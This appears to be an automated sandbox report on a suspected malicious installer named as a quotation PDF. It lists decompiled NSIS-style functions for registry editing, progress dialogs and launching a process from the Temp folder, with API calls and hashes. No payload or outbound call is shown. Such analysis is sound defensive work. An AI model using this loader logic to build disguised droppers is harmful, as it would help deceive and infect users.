
APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
wsprintfA.USER32 ref: 00402B7C
SetWindowTextA.USER32(?,?), ref: 00402B8C
SetDlgItemTextA.USER32 ref: 00402B9E

Strings

verifying installer: %d%%, xrefs: 00402B71
unpacking data: %d%%, xrefs: 00402B6A, 00402B7A

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99

Uniqueness

Uniqueness Score: -1.00%

Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

0x004022f6
0x004022fb
0x00402305
0x0040230f
0x00402312
0x00402322
0x0040232c
0x00402333
0x0040233b
0x00402349
0x0040234d
0x00402358
0x00402358
0x0040235c
0x00402360
0x00402366
0x0040236b
0x0040236b
0x0040236f
0x0040237b
0x0040237b
0x00402394
0x00402396
0x00402396
0x00402399
0x0040246f
0x0040246f
0x00402880
0x0040288c

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc1150.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc1150.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc1150.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F

Strings

C:\Users\user\AppData\Local\Temp\nsc1150.tmp, xrefs: 00402344, 00402366, 00402376, 00402381

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc1150.tmp
API String ID: 1356686001-3662228251
Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402bd1
0x00402bd3
0x00402bda
0x00402bdd
0x00402bdd
0x00402be3
0x00000000
0x00402be3
0x00402beb
0x00402bf1
0x00000000
0x00402bf4
0x00402bfb
0x00402c01
0x00402c07
0x00402c09
0x00402c0f
0x00402c4d
0x00402c53
0x00000000
0x00402c53
0x00402c11
0x00402c18
0x00402c29
0x00000000
0x00402c37
0x00402c18
0x00402c5a

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
GetTickCount.KERNEL32 ref: 00402BFB
CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D

Part of subcall function 00402BA9: MulDiv.KERNEL32(000310F6,00000064,000322EB), ref: 00402BBE

wsprintfA.USER32 ref: 00402C29

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF

Strings

... %d%%, xrefs: 00402C23

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 632923820-2449383134
Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A28(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

0x00402a49
0x00402a51
0x00402a79
0x00402a63
0x00402ab3
0x00402ab9
0x00000000
0x00402abb
0x00402a77
0x00000000
0x00000000
0x00402a77
0x00402a8e
0x00402a96
0x00402a9d
0x00402ac9
0x00000000
0x00000000
0x00402ad1
0x00402ad9
0x00000000
0x00000000
0x00000000
0x00402ad9
0x00000000
0x00402aac
0x00402ac0

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
RegCloseKey.ADVAPI32(?), ref: 00402A8E
RegCloseKey.ADVAPI32(?), ref: 00402AB3
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x00402880
0x0040288c

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32 ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404610, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}

0x00404618
0x0040461c
0x00404624
0x00404627
0x00404628
0x0040462a
0x0040462c
0x0040462f
0x0040462f
0x00404636
0x0040463c
0x0040463c
0x00404643
0x0040464e
0x0040464f
0x00404652
0x00404652
0x0040465f
0x0040466a
0x0040466d
0x0040467f
0x00404686
0x00404687
0x00404696
0x004046a6
0x004046c2

APIs

lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
wsprintfA.USER32 ref: 004046A6
SetDlgItemTextA.USER32 ref: 004046B9

Strings

%u.%u%s%s, xrefs: 00404688

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402825
0x00402825
0x00402880
0x0040288c

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32 ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004052ee
0x0040530a
0x00405312
0x00405317
0x00000000
0x0040531d
0x00405321

APIs

CreateProcessA.KERNEL32 ref: 0040530A
CloseHandle.KERNEL32(?), ref: 00405317

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
Error launching installer, xrefs: 004052F8

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-7751565
Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405578, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}

0x00405579
0x00405590
0x00405598
0x00405598
0x004055a0

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
lstrcatA.KERNEL32(?,0040900C), ref: 00405598

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405578

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ec7
0x00401ecf
0x00401ed4
0x00401ed9
0x00401edd
0x00401ee0
0x00401ee2
0x00401ee9
0x00401ef2
0x00401efa
0x00401efd
0x00401f12
0x00401f18
0x00401f2b
0x00401f34
0x00401f40
0x00401f45
0x00401f45
0x00401f2b
0x00401f48
0x00401b75
0x00401b75
0x00401efd
0x00402880
0x0040288c

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
